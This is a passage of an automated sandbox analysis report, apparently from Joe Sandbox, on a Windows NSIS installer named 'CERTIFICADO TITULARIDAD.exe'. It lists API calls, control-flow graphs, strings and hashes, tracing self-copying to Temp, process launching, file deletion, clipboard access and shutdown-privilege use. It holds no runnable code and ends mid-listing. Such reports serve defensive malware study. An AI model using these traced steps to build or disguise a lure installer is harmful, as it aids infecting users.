                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403831
                                                                                                                          • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403845
                                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040391E
                                                                                                                            • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                                                          • wsprintfW.USER32 ref: 0040397B
                                                                                                                          • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 004039AE
                                                                                                                          • DeleteFileW.KERNEL32(0042C800), ref: 004039BA
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004039E8
                                                                                                                            • Part of subcall function 004062E1: MoveFileExW.KERNEL32(?,?,00000005,00405DDF,?,00000000,000000F1,?,?,?,?,?), ref: 004062EB
                                                                                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe,0042C800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004039FE
                                                                                                                            • Part of subcall function 00405B04: CreateProcessW.KERNEL32(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B2D
                                                                                                                            • Part of subcall function 00405B04: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B3A
                                                                                                                            • Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(?,00425F58,Forums.Mel,00405F41,Forums.Mel,Forums.Mel,00000000,Forums.Mel,Forums.Mel, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                                                                            • Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895
                                                                                                                          • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A4C
                                                                                                                          • ExitProcess.KERNEL32 ref: 00403A69
                                                                                                                          • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403A70
                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A8C
                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403A93
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403ACB
                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
                                                                                                                          • ExitProcess.KERNEL32 ref: 00403B13
                                                                                                                            • Part of subcall function 00405ACF: CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                                                          • String ID: "C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe$C:\Users\user\subprovince$C:\Users\user\subprovince$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                                                          • API String ID: 1813718867-982291891
                                                                                                                          • Opcode ID: 861c3a791dac713e5dc6c418a8dec487fa289242a5d5f99aa186722fda572ff2
                                                                                                                          • Instruction ID: bee44f309595f2ff458e9cecae568de25c9667724a66d0f49069eb89ae1a0629
                                                                                                                          • Opcode Fuzzy Hash: 861c3a791dac713e5dc6c418a8dec487fa289242a5d5f99aa186722fda572ff2
                                                                                                                          • Instruction Fuzzy Hash: FDF10170204301ABD720AF659D05B2B3EE8EB8570AF11483EF581B62D1DB7DCA45CB6E

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 151 4056e5-405700 152 405706-4057cd GetDlgItem * 3 call 4044d5 call 404e2e GetClientRect GetSystemMetrics SendMessageW * 2 151->152 153 40588f-405896 151->153 174 4057eb-4057ee 152->174 175 4057cf-4057e9 SendMessageW * 2 152->175 155 4058c0-4058cd 153->155 156 405898-4058ba GetDlgItem CreateThread CloseHandle 153->156 158 4058eb-4058f5 155->158 159 4058cf-4058d5 155->159 156->155 163 4058f7-4058fd 158->163 164 40594b-40594f 158->164 161 405910-405919 call 404507 159->161 162 4058d7-4058e6 ShowWindow * 2 call 4044d5 159->162 171 40591e-405922 161->171 162->158 169 405925-405935 ShowWindow 163->169 170 4058ff-40590b call 404479 163->170 164->161 167 405951-405957 164->167 167->161 176 405959-40596c SendMessageW 167->176 172 405945-405946 call 404479 169->172 173 405937-405940 call 4055a6 169->173 170->161 172->164 173->172 180 4057f0-4057fc SendMessageW 174->180 181 4057fe-405815 call 4044a0 174->181 175->174 182 405972-40599d CreatePopupMenu call 40655e AppendMenuW 176->182 183 405a6e-405a70 176->183 180->181 190 405817-40582b ShowWindow 181->190 191 40584b-40586c GetDlgItem SendMessageW 181->191 188 4059b2-4059c7 TrackPopupMenu 182->188 189 40599f-4059af GetWindowRect 182->189 183->171 188->183 193 4059cd-4059e4 188->193 189->188 194 40583a 190->194 195 40582d-405838 ShowWindow 190->195 191->183 192 405872-40588a SendMessageW * 2 191->192 192->183 196 4059e9-405a04 SendMessageW 193->196 197 405840-405846 call 4044d5 194->197 195->197 196->196 198 405a06-405a29 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->191 200 405a2b-405a52 SendMessageW 198->200 200->200 201 405a54-405a68 GlobalUnlock SetClipboardData CloseClipboard 200->201 201->183
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 00405743
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405752
                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040578F
                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 00405796
                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B7
                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C8
                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057DB
                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E9
                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FC
                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581E
                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405832
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405853
                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405863
                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587C
                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405888
                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405761
                                                                                                                            • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004058A5
                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005679,00000000), ref: 004058B3
                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 004058BA
                                                                                                                          • ShowWindow.USER32(00000000), ref: 004058DE
                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004058E3
                                                                                                                          • ShowWindow.USER32(00000008), ref: 0040592D
                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405961
                                                                                                                          • CreatePopupMenu.USER32 ref: 00405972
                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405986
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004059A6
                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BF
                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F7
                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405A07
                                                                                                                          • EmptyClipboard.USER32 ref: 00405A0D
                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A19
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405A23
                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A37
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405A57
                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405A62
                                                                                                                          • CloseClipboard.USER32 ref: 00405A68
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                          • String ID: {
                                                                                                                          • API String ID: 590372296-366298937
                                                                                                                          • Opcode ID: b00847ff47827a43b93895459648fd8745bc42cf01a25ae6d3cf6e6dbf784441
                                                                                                                          • Instruction ID: bfdbfabbc3eccdd340dcac883e36f8678c6b127a6a9b52dc92d7db9eae4071ee
                                                                                                                          • Opcode Fuzzy Hash: b00847ff47827a43b93895459648fd8745bc42cf01a25ae6d3cf6e6dbf784441
                                                                                                                          • Instruction Fuzzy Hash: FBB127B1900618FFDB11AF60DD89AAE7B79FB44354F00813AFA41B61A0CB754A92DF58

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 509 405c2d-405c53 call 405ef8 512 405c55-405c67 DeleteFileW 509->512 513 405c6c-405c73 509->513 514 405de9-405ded 512->514 515 405c75-405c77 513->515 516 405c86-405c96 call 406521 513->516 517 405d97-405d9c 515->517 518 405c7d-405c80 515->518 524 405ca5-405ca6 call 405e3c 516->524 525 405c98-405ca3 lstrcatW 516->525 517->514 520 405d9e-405da1 517->520 518->516 518->517 522 405da3-405da9 520->522 523 405dab-405db3 call 40687e 520->523 522->514 523->514 533 405db5-405dc9 call 405df0 call 405be5 523->533 527 405cab-405caf 524->527 525->527 529 405cb1-405cb9 527->529 530 405cbb-405cc1 lstrcatW 527->530 529->530 532 405cc6-405ce2 lstrlenW FindFirstFileW 529->532 530->532 534 405ce8-405cf0 532->534 535 405d8c-405d90 532->535 549 405de1-405de4 call 4055a6 533->549 550 405dcb-405dce 533->550 537 405d10-405d24 call 406521 534->537 538 405cf2-405cfa 534->538 535->517 540 405d92 535->540 551 405d26-405d2e 537->551 552 405d3b-405d46 call 405be5 537->552 541 405cfc-405d04 538->541 542 405d6f-405d7f FindNextFileW 538->542 540->517 541->537 545 405d06-405d0e 541->545 542->534 548 405d85-405d86 FindClose 542->548 545->537 545->542 548->535 549->514 550->522 555 405dd0-405ddf call 4055a6 call 4062e1 550->555 551->542 556 405d30-405d39 call 405c2d 551->556 560 405d67-405d6a call 4055a6 552->560 561 405d48-405d4b 552->561 555->514 556->542 560->542 564 405d4d-405d5d call 4055a6 call 4062e1 561->564 565 405d5f-405d65 561->565 564->542 565->542
                                                                                                                          APIs
                                                                                                                          • DeleteFileW.KERNELBASE(?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe"), ref: 00405C56
                                                                                                                          • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe"), ref: 00405C9E
                                                                                                                          • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe"), ref: 00405CC1
                                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe"), ref: 00405CC7
                                                                                                                          • FindFirstFileW.KERNELBASE(00424F10,?,?,?,0040A014,?,00424F10,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe"), ref: 00405CD7
                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D77
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405D86
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C3A
                                                                                                                          • "C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe", xrefs: 00405C36
                                                                                                                          • \*.*, xrefs: 00405C98
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                          • String ID: "C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                          • API String ID: 2035342205-2545579678
                                                                                                                          • Opcode ID: 0b85f367639a69f5b614f98777155fba44d4349fb39831c7af8fd38ecdabae30
                                                                                                                          • Instruction ID: aec485693c4c1533f42b9347a66a6bbcb57ea8568fe9c979ecac7928daa7b7f5
                                                                                                                          • Opcode Fuzzy Hash: 0b85f367639a69f5b614f98777155fba44d4349fb39831c7af8fd38ecdabae30
                                                                                                                          • Instruction Fuzzy Hash: 8741D230801A14BADB31BB659D4DAAF7678EF41718F14813FF801B11D5D77C8A829EAE
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNELBASE(?,00425F58,Forums.Mel,00405F41,Forums.Mel,Forums.Mel,00000000,Forums.Mel,Forums.Mel, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00406895
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                          • String ID: Forums.Mel$X_B
                                                                                                                          • API String ID: 2295610775-3466927583
                                                                                                                          • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                                                                          • Instruction ID: 6d56574ea64d1328abe48e6f64e5cab5a12c2004fb3b9259b4ed260009733db8
                                                                                                                          • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                                                                          • Instruction Fuzzy Hash: AFD0123250A5205BC6406B386E0C84B7A58AF553717268A36F5AAF21E0CB788C6696AC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
                                                                                                                          • Instruction ID: 98dfc50ccd9688b87079ede1b44bfc78bfb7a95d74622a08e623e0ee65e5f8c5
                                                                                                                          • Opcode Fuzzy Hash: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
                                                                                                                          • Instruction Fuzzy Hash: B2F17870D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFindFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1974802433-0
                                                                                                                          • Opcode ID: 39ec8271ecbe68cd688bb189458c102c7666cef281f0bf442c703dc48e606f12
                                                                                                                          • Instruction ID: a06f58704ac02dcae893024ea8a23b5ac4ca5f5a8623c8e138aed3c50dac2e18
                                                                                                                          • Opcode Fuzzy Hash: 39ec8271ecbe68cd688bb189458c102c7666cef281f0bf442c703dc48e606f12
                                                                                                                          • Instruction Fuzzy Hash: 44F05E71A04104AAD711EBE4E9499AEB378EF14314F60057BE101F21D0DBB84D019B2A

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 202 403fa1-403fb3 203 403fb9-403fbf 202->203 204 40411a-404129 202->204 203->204 205 403fc5-403fce 203->205 206 404178-40418d 204->206 207 40412b-404173 GetDlgItem * 2 call 4044a0 SetClassLongW call 40140b 204->207 210 403fd0-403fdd SetWindowPos 205->210 211 403fe3-403fea 205->211 208 4041cd-4041d2 call 4044ec 206->208 209 40418f-404192 206->209 207->206 224 4041d7-4041f2 208->224 213 404194-40419f call 401389 209->213 214 4041c5-4041c7 209->214 210->211 216 403fec-404006 ShowWindow 211->216 217 40402e-404034 211->217 213->214 238 4041a1-4041c0 SendMessageW 213->238 214->208 223 40446d 214->223 225 404107-404115 call 404507 216->225 226 40400c-40401f GetWindowLongW 216->226 219 404036-404048 DestroyWindow 217->219 220 40404d-404050 217->220 227 40444a-404450 219->227 230 404052-40405e SetWindowLongW 220->230 231 404063-404069 220->231 229 40446f-404476 223->229 234 4041f4-4041f6 call 40140b 224->234 235 4041fb-404201 224->235 225->229 226->225 236 404025-404028 ShowWindow 226->236 227->223 241 404452-404458 227->241 230->229 231->225 237 40406f-40407e GetDlgItem 231->237 234->235 242 404207-404212 235->242 243 40442b-404444 DestroyWindow EndDialog 235->243 236->217 245 404080-404097 SendMessageW IsWindowEnabled 237->245 246 40409d-4040a0 237->246 238->229 241->223 247 40445a-404463 ShowWindow 241->247 242->243 244 404218-404265 call 40655e call 4044a0 * 3 GetDlgItem 242->244 243->227 274 404267-40426c 244->274 275 40426f-4042ab ShowWindow KiUserCallbackDispatcher call 4044c2 EnableWindow 244->275 245->223 245->246 249 4040a2-4040a3 246->249 250 4040a5-4040a8 246->250 247->223 252 4040d3-4040d8 call 404479 249->252 253 4040b6-4040bb 250->253 254 4040aa-4040b0 250->254 252->225 257 4040f1-404101 SendMessageW 253->257 259 4040bd-4040c3 253->259 254->257 258 4040b2-4040b4 254->258 257->225 258->252 262 4040c5-4040cb call 40140b 259->262 263 4040da-4040e3 call 40140b 259->263 270 4040d1 262->270 263->225 272 4040e5-4040ef 263->272 270->252 272->270 274->275 278 4042b0 275->278 279 4042ad-4042ae 275->279 280 4042b2-4042e0 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 4042e2-4042f3 SendMessageW 280->281 282 4042f5 280->282 283 4042fb-40433a call 4044d5 call 403f82 call 406521 lstrlenW call 40655e SetWindowTextW call 401389 281->283 282->283 283->224 294 404340-404342 283->294 294->224 295 404348-40434c 294->295 296 40436b-40437f DestroyWindow 295->296 297 40434e-404354 295->297 296->227 299 404385-4043b2 CreateDialogParamW 296->299 297->223 298 40435a-404360 297->298 298->224 300 404366 298->300 299->227 301 4043b8-40440f call 4044a0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 299->301 300->223 301->223 306 404411-404424 ShowWindow call 4044ec 301->306 308 404429 306->308 308->227
                                                                                                                          APIs
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FDD
                                                                                                                          • ShowWindow.USER32(?), ref: 00403FFD
